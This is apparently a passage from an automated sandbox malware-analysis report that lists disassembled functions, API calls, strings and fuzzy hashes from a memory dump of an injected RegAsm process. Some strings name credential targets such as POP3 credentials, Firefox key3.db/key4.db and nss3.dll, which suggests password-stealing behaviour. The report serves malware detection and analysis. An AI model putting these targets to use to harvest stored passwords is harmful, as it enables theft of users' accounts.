                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 12014FB49017009ADB30AF75C809B46BBE0EFA9704F214C2FE295A3691E77ED445CF88
                                                                                                                                                                                                                      Function 00405983 Relevance: 12.2, APIs: 8, Instructions: 200windowCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00405A31
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00405A47
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00405A5F
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00405A7A
                                                                                                                                                                                                                      • EndDialog.USER32(?,00000002), ref: 00405A96
                                                                                                                                                                                                                      • EndDialog.USER32(?,00000001), ref: 00405AA9
                                                                                                                                                                                                                        • Part of subcall function 00405737: GetDlgItem.USER32(?,000003E9), ref: 00405745
                                                                                                                                                                                                                        • Part of subcall function 00405737: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 0040575A
                                                                                                                                                                                                                        • Part of subcall function 00405737: SendMessageA.USER32(?,00001032,00000000,00000000), ref: 00405776
                                                                                                                                                                                                                      • SendDlgItemMessageA.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405AC1
                                                                                                                                                                                                                      • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405BC9
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Item$DialogMessageSend
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2485852401-0
                                                                                                                                                                                                                      • Opcode ID: ec9303a4946bc0e02ff46f830e49cd5227634f9872e1f7ef617901a07ad17536
                                                                                                                                                                                                                      • Instruction ID: 49f8b46d81ffaaf96d74304be2fa091063820ac2067ea90d1efd1f4607779086
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ec9303a4946bc0e02ff46f830e49cd5227634f9872e1f7ef617901a07ad17536
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BC619230600A45ABEB21AF65C8C5A2BB7A5EF40718F04C23BF515A76D1E778EA50CF58
                                                                                                                                                                                                                      Function 0040B38F Relevance: 12.1, APIs: 8, Instructions: 108windowCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040B3DC
                                                                                                                                                                                                                      • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040B411
                                                                                                                                                                                                                      • LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040B446
                                                                                                                                                                                                                      • LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040B462
                                                                                                                                                                                                                      • GetSysColor.USER32(0000000F), ref: 0040B472
                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 0040B4A6
                                                                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 0040B4A9
                                                                                                                                                                                                                      • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040B4C7
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: MessageSend$DeleteImageLoadObject$Color
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3642520215-0
                                                                                                                                                                                                                      • Opcode ID: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                                                                                                                                                                                      • Instruction ID: 78997c319ae04cc2c464f68e1b112159c67c6e7e05dd954700a2b997fe6bb290
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5A317275680308BFFA715B70DC87FD6B695EB48B00F104828F3857A1E1CAF279909B68
                                                                                                                                                                                                                      Function 00405BD9 Relevance: 12.1, APIs: 8, Instructions: 100windowCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2313361498-0
                                                                                                                                                                                                                      • Opcode ID: c0fd86ac5231b126ca71dbcda0134e8e863c460558ef4c97bad657530ca58ccb
                                                                                                                                                                                                                      • Instruction ID: 76b7db47255e00c5a16d586f34bfaf53fe76d4163934589152c5d70c184cfcdd
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c0fd86ac5231b126ca71dbcda0134e8e863c460558ef4c97bad657530ca58ccb
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AF31B3B1500605AFEB24AF69CC85E2AF7A8FF44354B00853FF55AE76A1D778EC408B94
                                                                                                                                                                                                                      Function 0040BB14 Relevance: 12.1, APIs: 8, Instructions: 76COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 0040BB33
                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 0040BB49
                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 0040BB5C
                                                                                                                                                                                                                      • BeginDeferWindowPos.USER32(00000003), ref: 0040BB79
                                                                                                                                                                                                                      • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 0040BB96
                                                                                                                                                                                                                      • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 0040BBB6
                                                                                                                                                                                                                      • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000004), ref: 0040BBDD
                                                                                                                                                                                                                      • EndDeferWindowPos.USER32(?), ref: 0040BBE6
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Window$Defer$Rect$BeginClient
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2126104762-0
                                                                                                                                                                                                                      • Opcode ID: 79eb62364e7a0dcd77e9d411930711777f01ecf57ddd8cbf010404b9f010fc5c
                                                                                                                                                                                                                      • Instruction ID: 10c9609a041f1aae696d54cc03c31aacdb7ad71aa251d7cd9d71944ddb51ea6f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 79eb62364e7a0dcd77e9d411930711777f01ecf57ddd8cbf010404b9f010fc5c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4521C376A00209FFDB518FE8DD89FEEBBB9FB08700F144065FA55A2160C771AA519B24
                                                                                                                                                                                                                      Function 004072D6 Relevance: 12.1, APIs: 8, Instructions: 72COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000011), ref: 004072E7
                                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000010), ref: 004072ED
                                                                                                                                                                                                                      • GetDC.USER32(00000000), ref: 004072FB
                                                                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,00000008,?,?,?,?,?,?,004012E4,?), ref: 0040730D
                                                                                                                                                                                                                      • GetDeviceCaps.GDI32(004012E4,0000000A,?,?,?,?,?,?,004012E4,?), ref: 00407316
                                                                                                                                                                                                                      • ReleaseDC.USER32(00000000,004012E4), ref: 0040731F
                                                                                                                                                                                                                      • GetWindowRect.USER32(004012E4,?), ref: 0040732C
                                                                                                                                                                                                                      • MoveWindow.USER32(004012E4,?,?,?,?,00000001), ref: 00407371
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1999381814-0
                                                                                                                                                                                                                      • Opcode ID: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                                                                                                                                                                                      • Instruction ID: 22bb5f5faf33eb927601db2df5736372c6ae1ca5e65390263d5238b88a5d6584
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C611A536E00219AFDF008FF9DC49BAE7FB9EB44311F040175EE05E3290DA70A8418A90
                                                                                                                                                                                                                      Function 004261F7 Relevance: 10.9, APIs: 2, Strings: 5, Instructions: 443COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpymemset
                                                                                                                                                                                                                      • String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
                                                                                                                                                                                                                      • API String ID: 1297977491-3883738016
                                                                                                                                                                                                                      • Opcode ID: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                                                                                                                                                                                      • Instruction ID: e5ed660087d787d4baabea17299805ba1702756b87ddf288a6169370bd8562d9
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FA128D75A00629DFCB14DF68E480AADBBB1BF08314F65409BE945AB341D738F981CF99
                                                                                                                                                                                                                      Function 00449630 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 203COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00449550: memset.MSVCRT ref: 0044955B
                                                                                                                                                                                                                        • Part of subcall function 00449550: memset.MSVCRT ref: 0044956B
                                                                                                                                                                                                                        • Part of subcall function 00449550: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                                                                                                                                                                                                                        • Part of subcall function 00449550: memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000040), ref: 0044972E
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044977B
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000040), ref: 004497F6
                                                                                                                                                                                                                        • Part of subcall function 00449260: memcpy.MSVCRT(00000001,00449392,00000040,?,?,?,00449392,?,?,?,?,004497AE,?,?,?,00000000), ref: 00449291
                                                                                                                                                                                                                        • Part of subcall function 00449260: memcpy.MSVCRT(00000001,00449392,00000008,?,?,?,00449392,?,?,?,?,004497AE,?,?,?,00000000), ref: 004492DD
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000000), ref: 00449846
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 00449887
                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 004498B8
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy$memset
                                                                                                                                                                                                                      • String ID: gj
                                                                                                                                                                                                                      • API String ID: 438689982-4203073231
                                                                                                                                                                                                                      • Opcode ID: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                                                                                                                                                                                                      • Instruction ID: 4698d9130898d2a28bd34890c38a7d1df91d0c58a43dc6add7b2b2ec2d892026
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AB71C9B35083448BE310EF65D88069FB7E9BFD5344F050A2EE98997301E635DE09C796
                                                                                                                                                                                                                      Function 0041230B Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 187COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: __aulldvrm$__aullrem
                                                                                                                                                                                                                      • String ID: -$-x0$0123456789ABCDEF0123456789abcdef
                                                                                                                                                                                                                      • API String ID: 643879872-978417875
                                                                                                                                                                                                                      • Opcode ID: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                                                                                                                                                                                                      • Instruction ID: 9a4dcd4671c0eaaf570ced65c0a394ff57d12b60ca94b612a12fd923c93321e5
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 09618C315083819FD7218F2886447ABBBE1AFC6704F18495FF8C4D7352D3B8C9998B4A
                                                                                                                                                                                                                      Function 0040DAC2 Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 145COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040DAE3
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040DAF7
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040DB0B
                                                                                                                                                                                                                        • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                                                                                                                                                                                                        • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                                                                                                                                                                                                        • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DBD8
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC1B
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC38
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpymemset$strlen$_memicmp
                                                                                                                                                                                                                      • String ID: user_pref("
                                                                                                                                                                                                                      • API String ID: 765841271-2487180061
                                                                                                                                                                                                                      • Opcode ID: 90d77a8e642e16426f01af40e3455a1a28465a86fb6cd763409838de826d4489
                                                                                                                                                                                                                      • Instruction ID: f707cbd7524a382ab05823b92859e6f0e78dc23985d18c56f1e7f2c379abc130
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 90d77a8e642e16426f01af40e3455a1a28465a86fb6cd763409838de826d4489
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0B4175769041189AD714DBA5DC81FDA77ACAF44314F1042BBA605B7181EA38AB49CFA8
                                                                                                                                                                                                                      Function 00405810 Relevance: 10.6, APIs: 7, Instructions: 125windowCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00405827
                                                                                                                                                                                                                      • SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 00405840
                                                                                                                                                                                                                      • SendMessageA.USER32(?,00001036,00000000,00000026), ref: 0040584D
                                                                                                                                                                                                                      • SendMessageA.USER32(?,0000101C,00000000,00000000), ref: 00405859
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004058C3
                                                                                                                                                                                                                      • SendMessageA.USER32(?,00001019,?,?), ref: 004058F4
                                                                                                                                                                                                                      • SetFocus.USER32(?), ref: 00405976
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: MessageSend$FocusItemmemset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 4281309102-0
                                                                                                                                                                                                                      • Opcode ID: 1e065b1851f46eedf46acd576a64098092c66e4320400e0dd2798a55d04b3de4
                                                                                                                                                                                                                      • Instruction ID: c72ca3e99ea405196032a5824f130882485a5617ada8e3d881518c79e7018221
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1e065b1851f46eedf46acd576a64098092c66e4320400e0dd2798a55d04b3de4
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4241F8B5900209AFDB20DF94DC81EAEBBB9EF04358F1440AAE908B7291D7759E50DF94
                                                                                                                                                                                                                      Function 0040A83A Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                                                                                                                                        • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00406D4D
                                                                                                                                                                                                                      • _mbscat.MSVCRT ref: 0040A8FF
                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 0040A921
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FileWrite_mbscatsprintfstrlen
                                                                                                                                                                                                                      • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                                                                                                                                      • API String ID: 1631269929-4153097237
                                                                                                                                                                                                                      • Opcode ID: 1edff87013eeafc9988ac017b7f9a6f14c9cca9b6a50fb5f6e60c21e7938a174
                                                                                                                                                                                                                      • Instruction ID: 568bce87a3ef0860ab630a318aded4c5cbf938598f8cce33e7c60ad495c5b4cb
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1edff87013eeafc9988ac017b7f9a6f14c9cca9b6a50fb5f6e60c21e7938a174
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 88318F32900208AFDF15DF94C886EDE7BB5FF44314F11416AF911BB2A2D779A951CB84
                                                                                                                                                                                                                      Function 00408DB6 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 100stringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(0045A550,strings,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,00403F8E,0044C530), ref: 00408E31
                                                                                                                                                                                                                        • Part of subcall function 00409240: _itoa.MSVCRT ref: 00409261
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00408E4F
                                                                                                                                                                                                                      • LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,00000001), ref: 00408EBE
                                                                                                                                                                                                                        • Part of subcall function 00408D34: ??2@YAPAXI@Z.MSVCRT ref: 00408D5C
                                                                                                                                                                                                                        • Part of subcall function 00408D34: ??2@YAPAXI@Z.MSVCRT ref: 00408D7A
                                                                                                                                                                                                                        • Part of subcall function 00408D34: ??2@YAPAXI@Z.MSVCRT ref: 00408D98
                                                                                                                                                                                                                        • Part of subcall function 00408D34: ??2@YAPAXI@Z.MSVCRT ref: 00408DA8
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 00408DCA
                                                                                                                                                                                                                      • strings, xrefs: 00408E27
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??2@$LoadString_itoa_mbscpymemcpystrlen
                                                                                                                                                                                                                      • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>$strings
                                                                                                                                                                                                                      • API String ID: 4036804644-4125592482
                                                                                                                                                                                                                      • Opcode ID: 93499d40d0ac09f03a262576db3bd02ec7d22a5ce3c652b96661fe7e7ae87012
                                                                                                                                                                                                                      • Instruction ID: 8088189cea062d7f30cfe1d816b9e84d6c9af13e32ba145f50863190e1f773ff
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 93499d40d0ac09f03a262576db3bd02ec7d22a5ce3c652b96661fe7e7ae87012
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4B3170B1101722AFD715DB15ED41E733766E7803067124A3FE981972A3CB39E8A1CB9E
                                                                                                                                                                                                                      Function 004080ED Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040810E
                                                                                                                                                                                                                        • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                                                                                                                                                                        • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                                                                                                                                                                                        • Part of subcall function 00404734: LoadLibraryA.KERNEL32(?), ref: 0040473C
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,004082A2,?,000000FD,00000000,00000000,?,00000000,004082A2,?,?,?,?,00000000), ref: 004081A9
                                                                                                                                                                                                                      • LocalFree.KERNEL32(?,?,?,?,?,00000000,770145ED,?), ref: 004081B9
                                                                                                                                                                                                                        • Part of subcall function 00410ADD: RegQueryValueExA.KERNEL32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                                                                                                                                                        • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                                                                                                                        • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: QueryValue$ByteCharFreeLibraryLoadLocalMultiWide_mbscpymemcpymemsetstrlen
                                                                                                                                                                                                                      • String ID: POP3_credentials$POP3_host$POP3_name
                                                                                                                                                                                                                      • API String ID: 3974279409-2190619648
                                                                                                                                                                                                                      • Opcode ID: 8d09f37c226a803f3cefd9e7f18468d8485906a60fce263c12780c476ab64e13
                                                                                                                                                                                                                      • Instruction ID: 3679de1ec208362151a8ef0ee52fb8317fff865e06d3e7d86d66f539d2f4ec3f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8d09f37c226a803f3cefd9e7f18468d8485906a60fce263c12780c476ab64e13
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5331507594021DAFDB11DB698C81EEEBB7CEF59304F0040BAF904A3141D6349A458F64
                                                                                                                                                                                                                      Function 00406B6D Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 86stringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00406B8E
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00406B99
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00406BFF
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00406C0D
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00406BA7
                                                                                                                                                                                                                        • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                                                                                                                                        • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: strlen$_mbscat_mbscpymemset
                                                                                                                                                                                                                      • String ID: key3.db$key4.db
                                                                                                                                                                                                                      • API String ID: 581844971-3557030128
                                                                                                                                                                                                                      • Opcode ID: 1b23ff19475b214b98e9218dd91c9d20610f24d325a1d0b0b24a5ae2e44b1aaa
                                                                                                                                                                                                                      • Instruction ID: ca97bc5828a50012869c36cbd7bca65918f6b78bc9695587552fe8d314e031cf
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1b23ff19475b214b98e9218dd91c9d20610f24d325a1d0b0b24a5ae2e44b1aaa
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4B210E3190811D6ADB10AA65DC41ECE77ACDB55318F1104BBF40DF60A1EE38DA958658
                                                                                                                                                                                                                      Function 004093B2 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77windowstringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ItemMenu$CountInfomemsetstrchr
                                                                                                                                                                                                                      • String ID: 0$6
                                                                                                                                                                                                                      • API String ID: 2300387033-3849865405
                                                                                                                                                                                                                      • Opcode ID: f43f1b6a3e30ed785ddb3ece00de2359a070e4505b5746840cef8f2021710bea
                                                                                                                                                                                                                      • Instruction ID: cca6cfeb93ac41a34237a001b959014c3c2918908c2e54b2122eb51ea62ba4e3
